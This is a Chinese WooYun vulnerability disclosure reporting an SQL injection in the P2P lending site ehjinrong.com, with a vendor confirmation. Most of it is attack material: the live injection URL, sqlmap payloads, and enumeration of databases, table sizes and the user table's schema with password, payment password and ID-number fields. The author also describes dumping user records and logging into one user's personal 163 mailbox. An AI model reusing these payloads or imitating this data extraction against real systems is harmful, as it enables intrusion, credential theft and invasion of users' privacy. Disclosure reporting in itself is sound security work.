当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161412

漏洞标题:P2P金融鄂汇金融存在SQL注入漏洞

相关厂商:ehjinrong.com

漏洞作者: Nelion

提交时间:2015-12-18 09:11

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-18: 细节已通知厂商并且等待厂商处理中
2015-12-18: 厂商已经确认,细节仅向厂商公开
2015-12-28: 细节向核心白帽子及相关领域专家公开
2016-01-07: 细节向普通白帽子公开
2016-01-17: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

P2P金融鄂汇金融存在SQL注入漏洞。管理员权限,4871条用户数据泄露,某些用户可登陆其邮箱,查看一些他的私密信息。

详细说明:

鄂汇金融服务(武汉)有限公司(ehjinrong.com)成立于2013年,注册资金2000万,地址位于武汉江汉区淮海路CBD泛海国际SOHO城"华中互联网金融产业基地"。是集小额贷款行业投资、小微贷款咨询服务与交易促成、信用风险评估及管理于一体的综合性金融服务公司,致力于P2P网贷运营服务。(官网介绍)
1、注入点:

https://www.ehjinrong.com/loan/list?contract_number=88952634&=88952634


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: contract_number (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: contract_number=-8294" OR 6430=6430#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: contract_number=-9011" OR 1 GROUP BY CONCAT(0x71766b6271,(SELECT (CASE WHEN (8377=8377)
THEN 1 ELSE 0 END)),0x716a6b6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: contract_number=88952634";(SELECT * FROM (SELECT(SLEEP(5)))VkCP)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: contract_number=88952634" AND (SELECT * FROM (SELECT(SLEEP(5)))mwDt)#
---
[09:37:37] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.11

漏洞证明:

2、所有数据库:

available databases [6]:
[*] eh_online
[*] ehui_online
[*] ehuiOnlne
[*] information_schema
[*] mysql
[*] test


3、当前库是ehui_online,看一下这个库的表及数据量:

Database: ehui_online
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| eh_cash | 496065 |
| eh_funds | 493594 |
| eh_user_balance | 343154 |
| eh_continued_tender_log | 302805 |
| eh_loginlog | 262085 |
| eh_score | 179185 |
| eh_sendsms_log | 173039 |
| eh_running_account | 160487 |
| eh_lottery_log | 130070 |
| eh_repay_invest | 91094 |
| eh_hf | 83164 |
| eh_repaydetail_log | 79319 |
| eh_reward_log | 66904 |
| eh_sms | 51361 |
| eh_invest | 50539 |
| eh_lottery_count_log | 36305 |
| eh_recharge | 35966 |
| eh_chkValue | 25897 |
| eh_drawcash | 21003 |
| eh_invest_coupon_map | 9571 |
| eh_coupon_result_log | 9058 |
| eh_loanimg | 8307 |
| eh_repay_detail | 6600 |
| eh_user_coupon | 5375 |
| eh_user | 4871 |
| eh_user_extra | 4871 |
| eh_user_finance | 4871 |
| eh_autobid | 4862 |
| eh_orders | 4419 |
| eh_loan | 3293 |
| eh_hat_area | 3144 |
| eh_profile_contact | 2965 |
| eh_profile_info | 2965 |
| eh_profile_authenticate | 2963 |
| eh_profile_job | 2963 |
| eh_bank | 2723 |
| eh_mail | 2565 |
| task_schedule_job | 2389 |
| eh_notice | 1884 |
| eh_ping_account | 1098 |
| eh_modify_user_log | 987 |
| eh_invite | 953 |
| eh_upload | 909 |
| eh_transfer | 811 |
| eh_caiwu | 573 |
| eh_upgrade_gold_log | 563 |
| eh_hat_city | 345 |
| eh_lookup | 252 |
| eh_poll_vote | 86 |
| eh_score_mall | 61 |
| eh_lookup_category | 39 |
| eh_apply_loan | 35 |
| eh_hat_province | 34 |
| eh_invest_ranking | 20 |
| eh_lottery_info | 14 |
| eh_coupon | 11 |
| eh_poll_choice | 8 |
| eh_adimages | 5 |
| eh_params | 3 |
| eh_poll | 1 |
+-------------------------+---------+


4、看一下用户表eh_user中的字段:

Database: ehui_online
Table: eh_user
[34 columns]
+------------------+-----------------------+
| Column | Type |
+------------------+-----------------------+
| level | varchar(20) |
| app_token | varchar(50) |
| balance | varchar(16) |
| bid_sms | enum('Y','N') |
| birthday | varchar(16) |
| continued_tender | varchar(16) |
| create_time | int(11) |
| credit | varchar(16) |
| email | varchar(64) |
| frozen | varchar(16) |
| hf_register_time | int(11) |
| id | varchar(32) |
| id_number | varchar(20) |
| is_email | enum('N','Y') |
| is_experience | enum('Y','N') |
| is_mobile | enum('N','Y') |
| is_realname | enum('N','Y') |
| mobile | varchar(11) |
| password | varchar(64) |
| pay_password | varchar(64) |
| push_sms | enum('Y','N') |
| real_name | varchar(32) |
| repay_sms | enum('Y','N') |
| roles | varchar(20) |
| roles_bak | varchar(16) |
| score_accu | decimal(14,2) |
| score_bal | decimal(14,2) |
| sex | enum('MALE','FEMALE') |
| source | varchar(32) |
| total_received | varchar(16) |
| update_time | timestamp |
| username | varchar(16) |
| UsrCustId | varchar(30) |
| UsrId | varchar(30) |
+------------------+-----------------------+


5、字段username,email,mobile,password的数据(部分):

01数据.png


6、数据库权限:

02数据库用户和权限.png


7、登录一下用户信息看一下:

03一个用户的信息.png


8、这个用户的163邮箱:

04这个哥们的163邮箱.png

修复方案:

参数过滤。还有其他参数你们也注意一下。

版权声明:转载请注明来源 Nelion@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-18 10:47

厂商回复:

感谢Nelion找出漏洞

最新状态:

暂无